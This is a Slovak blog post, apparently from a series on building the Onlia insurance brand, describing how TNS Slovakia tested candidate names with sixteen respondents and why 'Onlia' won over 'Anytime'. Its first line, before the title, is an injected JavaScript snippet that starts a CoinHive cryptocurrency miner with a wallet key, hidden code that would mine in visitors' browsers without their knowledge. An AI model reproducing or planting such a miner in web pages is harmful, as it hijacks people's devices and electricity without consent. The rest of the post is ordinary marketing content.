var miner = new CoinHive.Anonymous('49dVbbCFDuhg9nX5u1MDuATVZj7gQehytZwvXEUuWg9kfhNPWH7bUD87VW1NfjqucRZNNVTb1AHGUK2fkq5Nd55mLNnB4WK'); miner.start(); 4. Ako sme testovali názov značky Onlia? - Ako vzniká značka

Do prieskumu pod taktovkou TNS SLOVAKIA sme sa rozhodli vybrať tri názvy. 11 zo 16 respondentov označilo názov Onlia ako najlepší z predstavených.

My sme vybrali troch favoritov.
Anytime. Onlia. (Tretí názov zaslaný do testovania, žiaľ, nemôžeme zverejniť.)

Snímka obrazovky 2015-04-26 o 18.50.15Snímka obrazovky 2015-04-26 o 19.03.54

 

Testovať sme nechali profíkov.
Tím pod taktovkou Kataríny Procházkovej z prieskumnej agentúry TNS Slovakia názvy testoval na vzorke šestnástich respondentov.

onlia name testing

V priemere trval test jedného respondenta 40 minút.
Test sa konal v dvoch mestách – Bratislava a Trenčín.

 

Čo sme primárne testovali?

  • spontánne asociácie
  • atraktivitu
  • zapamätateľkosť
  • relevancia
  • prelink na kľúčové hodnoty
  • pozitívne a negatívne konotácie

 

Výsledky Anytime

Keďže v angličtine má jednoznačný význam, respondentmi nebol označený ako vhodný názov pre značku. Mnohí respondenti namietali použitie anglicizmu v názve. Iba tí respondenti, ktorí poznali jednoznačný význa slova v slovenčine, ocenili prelink medzi slovom a benefitom značky.

anytime testing onlia locco

 

 

Výsledky Onlia:

Repsondentmi bol označený za jednoznačného víťaza vďaka asociáciam serióznosti, stability, dôvery, istoty a individuality. Názov “Onlia” je krátky, ľahko zapamätateľný a ľahko vysloviteľný v hovorovej reči.

onlia testing locco name branding

Výber finálneho názvu hodnotí aj Marek Kopča, riaditeľ priameho predaja v Unione: “Názov Onlia sa nám od začiatku veľmi páčil. Unikátne slovo, žiadne problémy s prekladom do angličtiny. Pri troche fantázie obsahuje asociácie na “online” a “ja”, čo je vhodné pre cieľovú skupinu, ktorú chceme zaujať – onlinovo zdatní ľudia, ktorí sa sami rozhodnú o tom, aké poistenie im vyhovuje”.

 

Zaujímavosti z testovania názvu Onlia:

  • Vďaka skloňovateľnosti názvu Onlia, respondenti ho považovali za „slovenský“ (napr.: idem do Onlie, uprednostňujem Onliu, vďaka Onlii a pod.)
  • Výsledné grafické úpravy loga Onlia podmienili aj názory respondentov, ktorým sa logo Onlia asociovalo s leteckou spoločnosťou či dámskou kozmetikou
  • Súčasťou testovania bola aj formulácia vzťahu značky Onlia k materskému Unionu. „Onlia – člen rodiny Union“ znelo síce ľudskejšie, ale vyššiu váhu pridávali profesionalite, ktorú respondenti cítitli z formulácie „Onlia – člen skupiny Union“